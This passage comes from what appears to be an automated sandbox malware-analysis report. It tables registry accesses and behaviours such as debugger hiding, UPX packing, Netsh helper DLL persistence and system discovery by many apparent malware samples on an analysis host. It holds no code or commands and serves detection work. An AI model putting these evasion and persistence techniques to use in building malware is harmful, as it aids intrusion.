| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Mozilla\\Firefox\\Desktop Background.bmp" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Files\PowerRat.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
Drops file in Windows directory
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\Rage.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\PowerRat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\856.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\ciscotest.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\7777.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\7777.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\q1wnx5ir.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\svc1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\99awhy8l.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\surfex.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\StUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\StUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\qNVQKFyM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\temp_16933.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\7777.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\TCP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\q1wnx5ir.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\ProcessMonitor\Procmon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\msf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\Fast%20Download.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\key.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\temp_16933.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\7777.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\temp_16933.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\sommnx\bmxe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\werfault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\werfault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\werfault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
